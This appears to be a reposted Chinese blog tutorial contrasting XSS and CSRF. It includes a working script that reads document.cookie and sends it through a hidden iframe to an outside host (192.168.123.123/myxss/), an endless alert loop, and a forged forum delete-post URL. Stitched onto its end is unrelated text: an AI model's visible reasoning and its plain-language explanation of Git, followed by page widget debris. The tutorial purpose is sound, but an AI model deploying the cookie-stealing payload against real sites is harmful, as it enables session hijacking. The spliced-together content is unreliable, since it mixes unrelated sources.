用大白话谈谈XSS与CSRF

本文用通俗易懂的语言解释了XSS(跨站脚本)与CSRF(跨站请求伪造)的区别及其实现方式,通过实例帮助读者理解这两种常见的网络安全攻击。

这两个关键词也是老生常谈了,但是还总是容易让人忘记与搞混~。
XSS与CSRF这两个关键词时常被拉出来一起比较(尤其是面试),我在这里也在写一篇扫盲文,也帮自己整理一下知识脉络。

这篇文章会用尽量“人话”的语言解释这二个关键词,让同学们对跨域,安全有更深一层次的了解。

国际惯例,先上一下维基百科:

XSS:跨站脚本(Cross-site scripting,通常简称为XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言
I
CSRF:跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法


维基的解释依旧高深莫测啊,我用 “人话”给大家解释一下吧。

XSS: 通过客户端脚本语言(最常见如:JavaScript),在网页上注入恶意脚本,且代码内容请求外部服务器。
在一个论坛发帖中发布一段恶意的JavaScript代码就是脚本注入,如果这个代码内容有请求外部服务器,那么就叫做XSS!

CSRF:又称XSRF,冒充用户发起请求(在用户不知情的情况下),完成一些违背用户意愿的请求(如恶意发帖,删帖,改密码,发邮件等)。

很多同学会搞不明白XSS与CSRF的区别,虽然这两个关键词时常抱团出现,但他们两个是不同维度的东西(或者说他们的目的是不一样的)。
XSS更偏向于方法论,CSRF更偏向于一种形式,只要是伪造用户发起的请求,都可成为CSRF攻击。

通常来说CSRF是由XSS实现的,所以CSRF时常也被称为XSRF[用XSS的方式实现伪造请求](但实现的方式绝不止一种,还可以直接通过命令行模式(命令行敲命令来发起请求)直接伪造请求[只要通过合法验证即可])。
XSS更偏向于代码实现(即写一段拥有跨站请求功能的JavaScript脚本注入到一条帖子里,然后有用户访问了这个帖子,这就算是中了XSS攻击了),CSRF更偏向于一个攻击结果,只要发起了冒牌请求那么就算是CSRF了。

简单来说,条条大路(XSS路,命令行路)通罗马(CSRF马,XSRF马)。

前面讲了那么多理论介绍,那么我们来看一看实际代码吧。

【 Talk is cheap,Show me the code 】

场景:我在一条帖子里面写下了如下代码,发了出去,然后陆陆续续有很多可爱(wu / zhi) 的用户访问到这个帖子,然后用户接下来的所有操作都由我这串代码掌控了(各种姿势混着玩~)

如下:

while(true){
    alert('你关不掉我');
}

这个就是最原始的脚本注入了。
用户进来就麻烦了,一直弹窗一直弹窗。

那么XSS(跨站脚本)就是照瓢画葫了,用JavaScript写一个请求跨站的脚本就是XSS了,如下:


// 用 <script type="text/javascript"></script> 包起来放在评论中
(function(window, document) {
    // 构造泄露信息用的 URL
    var cookies = document.cookie;
    var xssURIBase = "http://192.168.123.123/myxss/";
    var xssURI = xssURIBase + window.encodeURI(cookies);
    // 建立隐藏 iframe 用于通讯
    var hideFrame = document.createElement("iframe");
    hideFrame.height = 0;
    hideFrame.width = 0;
    hideFrame.style.display = "none";
    hideFrame.src = xssURI;
    // 开工
    document.body.appendChild(hideFrame);
})(window, document);

此段代码携带着cookie信息传输给了 http://192.168.123.123/myxss/... 这段服务器,然后服务器的代码就可以接收到了用户的隐私消息,继而继续做其他的业务处理(myxss/index.php 中写一些可怕的代码,如把用户信息存进自己的数据库)。

有没感觉到背后一寒

看到这里感觉到危险了吧(想想初学程序时我们的站点完全没有这个意识,活生生的是在裸奔),=
既然此段脚本注入能携带着用户信息到收集服务器,那么再研究研究,他自然能发邮件?发帖?一系列业务逻辑? ~~当然可以!。

这里tips一下:上面的代码仅仅是XSS,并没有发生CSRF,因为192.168.123.123/myxss/index.php 仅仅是把用户信息存起来了而已,他并没有“伪造”用户发起一些请求,所以他只算是XSS攻击而不算是CSRF攻击,如果192.168.123.123/myxss/index.php 写的代码是 将当前用户的昵称改为“我是大笨猪”,那么就算是CSRF攻击了,因为这段代码伪造用户发出了请求(但是用户却不自知)。

那么下面我介绍一下最最简单的CSRF攻击(没有用到XSS的哦):
一个论坛,经过我的多次抓包分析(着重分析请求返回头,请求返回体)了解到这个论坛的删帖操作是触发 csdnblog.com/bbs/delete_article.php?id=“X" 那么,我只需要在论坛中发一帖,包含一链接:www.csdnblog.com/bbs/delete_article.php?id=“X" ,只要有用户点击了这个链接,那么ID为X的这一篇文章就被删掉了,而且是用户完全不知情的情况(敲黑板状:此处我可没有写XSS脚本哦,我纯粹是发一个url地址出来而已,既然删除操作可以伪造,那么只要我细细分析,其他操作(发帖,改名字,发私信,只要是这个论坛具有的功能)我都可以伪造咯!

XSS与CSRF讲完了,回头我会讲下如何防范XSS与CSRF。



(转载: https://segmentfault.com/a/1190000007059639)

<think>嗯,用户让我用大白话解释Git是什么。之前我已经给过比较专业的解释,但用户这次特别强调要通俗易懂,还提供了几个引用资源,都是强调"小白视角"和"大白话"的。 用户可能是个编程新手,或者之前被专业术语吓到过。ta提到的引用[1]里说"看过就忘""苦不堪言",引用[2][3]都反复强调"大白话",说明用户需要完全避开技术黑话。 我注意到上次回答虽然全面,但用了"分布式版本控制""SHA-1哈希"这类术语。这次得彻底转化:把Git比喻成游戏存档系统可能不错,因为存档/读档是常见体验。引用[2]提到"git和github是两码事"这点很重要,很多新手会混淆。 核心要点应该是: - 版本控制=游戏存档(随时保存不怕玩砸) - 分支=平行宇宙(实验性操作不毁原世界) - 远程仓库=云存档(多设备同步+队友共享) 避免提到任何命令,重点说清概念。用户引用[3]提到"跳过理论直接命令行"的问题,所以这次连git add/commit这些基础命令都先不提,纯原理。 最后用"写小说改稿子"的生活化场景收尾,这样哪怕完全不懂编程的人也能理解。相关问题的设计也要延续这个风格,比如"手滑删错文件怎么找回"这种实际痛点。</think>好的,咱们用最直白的大白话来聊聊 Git 是什么,就像聊天一样: **想象一下你在写一篇重要的小说(或者做一份重要的报告、设计一个图纸):** 1. **你会不断修改:** 今天写一章,明天觉得不好删掉重写,后天又想加个人物。 2. **你会担心出错:** 万一改了半天,发现还是之前的好,想找回来怎么办?万一不小心删掉了重要段落怎么办? 3. **你可能需要和别人合作:** 比如你和朋友一起写,你写一部分,他写一部分,最后怎么合到一起? **Git 就是帮你解决这些头疼问题的超级智能“时光机”+“协作神器”!** **它具体能干啥?** 1. **📸 自动“拍照存档”(版本控制):** * 每当你觉得写到一个不错的地方(比如完成一小节、修复了一个bug),你就可以告诉 Git:“嘿,给我现在这个状态拍个快照存起来!” * 这样,**无论你后面怎么改、怎么删、甚至改得一塌糊涂,你随时都能“回到”之前拍过的任何一个快照的状态**。就像游戏存档一样,玩砸了还能读档重来!再也不用怕改错了东西找不回来。[^1][^3] 2. **🌳 开“平行宇宙”做实验(分支管理):** * 你想尝试一个大胆的新剧情(或者一个新功能),但又怕把现在好好的稿子搞乱? * Git 可以让你**瞬间复制一份当前的小说副本(创建一个“分支”)**,在这个安全的“平行宇宙”里随便折腾。改好了,满意了,再把“平行宇宙”里的成果合并回主稿子;改砸了?直接把这个分支删掉,主稿子完全不受影响![^1][^3] 3. **🤝 和别人一起写不打架(团队协作):** * 你和朋友都要写同一篇小说。Git 提供了一个**公共的“云盘”(远程仓库,比如 GitHub、GitLab 等)**。 * 你先把你写好的部分存到本地 Git 仓库(拍照存档),然后**“上传”(push)** 到云盘上。 * 你的朋友就能**“下载”(pull)** 你写的最新内容到他自己的电脑上。 * 他改完他那部分,也拍照存档,再上传到云盘。 * 这样你们就能互相看到对方的进度和修改,Git 还会尽量帮你们**自动合并**各自的修改。万一你们改到了同一句话(冲突),Git 也会标出来让你们商量着解决。[^2][^4] 4. **🔒 保证稿子安全(数据完整性):** * Git 给每次“拍照存档”都生成一个**独一无二的“指纹”**。一旦存档,里面的内容就**不可能被悄悄篡改**。如果有人改了,指纹就对不上了,马上就能发现。[^3] **总结一下,Git 是啥?** * **一个超级智能的“时光机”**:随时回到你作品的任何一个历史版本。 * **一个安全的“实验沙盒”**:让你在“平行宇宙”里大胆尝试新想法,不影响主线。 * **一个高效的“团队协作工具”**:让大家安全地一起修改同一份作品,互相能看到进度,自动合并修改。 * **一个可靠的“历史记录本”**:完整记录作品的每一次变化,保证记录真实可靠。 **简单说:Git 就是帮你管理文件(尤其是代码)所有修改历史,并且让你能安全、方便地和别人一起干活的神奇工具!** 它本身是个软件(工具),而 GitHub 这类网站是提供存放你 Git 仓库的“云盘”服务(仓库)。[^2][^3] --- **
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值